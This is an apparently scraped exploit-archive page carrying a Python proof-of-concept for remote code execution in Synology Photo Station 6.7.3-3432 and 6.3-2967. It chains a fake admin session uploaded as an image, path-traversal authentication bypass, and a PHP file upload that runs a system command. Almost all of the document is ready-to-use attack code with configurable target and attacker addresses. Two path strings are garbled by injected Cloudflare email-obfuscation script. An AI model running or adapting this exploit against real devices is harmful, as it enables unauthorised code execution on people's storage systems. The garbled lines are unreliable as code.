ExploitFixes
Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution 2017-08-08 20:05:02

'''
Source: https://blogs.securiteam.com/index.php/archives/3356

Vulnerability details
The remote code execution is a combination of 4 different vulnerabilities:

Upload arbitrary files to the specified directories
Log in with a fake authentication mechanism
Log in to Photo Station with any identity
Execute arbitrary code by authenticated user with administrator privileges
The chain of vulnerabilities will allow you, in the end, to execute code as:

uid=138862(PhotoStation) gid=138862(PhotoStation) groups=138862(PhotoStation)
'''
import requests

# What server you want to attack
synology_ip = 'http://192.168.1.100'

# Your current IP
ip = '192.168.1.200'

# PHP code you want to execute
php_to_execute = '<?php echo system("id"); ?>'

encoded_session = 'root|a:2:{s:19:"security_identifier";s:'+str(len(ip))+':"'+ip+'";s:15:"admin_syno_user";s:7:"hlinak3";}'

print "[+] Set fake admin sesssion"
file = [('file', ('foo.jpg', encoded_session))]

r = requests.post('{}/photo/include/synotheme_upload.php'.format(synology_ip), data = {'action':'logo_upload'}, files=file)
print r.text

print "[+] Login as fake admin"

# Depends on version it might be stored in different dirs
payload = {'session': '/../../../../../var/packages/PhotoStation/etc/blog/photo_custom_preview_logo.png'}
# payload = {'session': '/../../../../..<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="644b1205164b170116120d0701174b140c0b100b4b240105200d16">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>/SYNOPHOTO_THEME_DIR/photo_custom_preview_logo.png'}

try_login = requests.post('{}/photo/include/file_upload.php'.format(synology_ip), params=payload)

whichact = {'action' : 'get_setting'}
r = requests.post('{}/photo/admin/general_setting.php'.format(synology_ip), data=whichact, cookies=try_login.cookies)
print r.text

print "[+] Upload php file"

c = {'action' : 'save', 'image' : 'data://text/plain;base64,'+php_to_execute.encode('base64'), 'path' : '/volume1/photo/../../..<a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="012e776e6d746c64302e4160717172756e7364">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>/PhotoStation/photo/facebook/exploit'.encode("base64"), 'type' : 'php'}
r = requests.post('{}/photo/PixlrEditorHandler.php'.format(synology_ip), data=c, cookies=try_login.cookies)
print r.text


print "[+] Execute payload"
f = requests.get('{}/photo/facebook/exploit.php'.format(synology_ip))

print f.text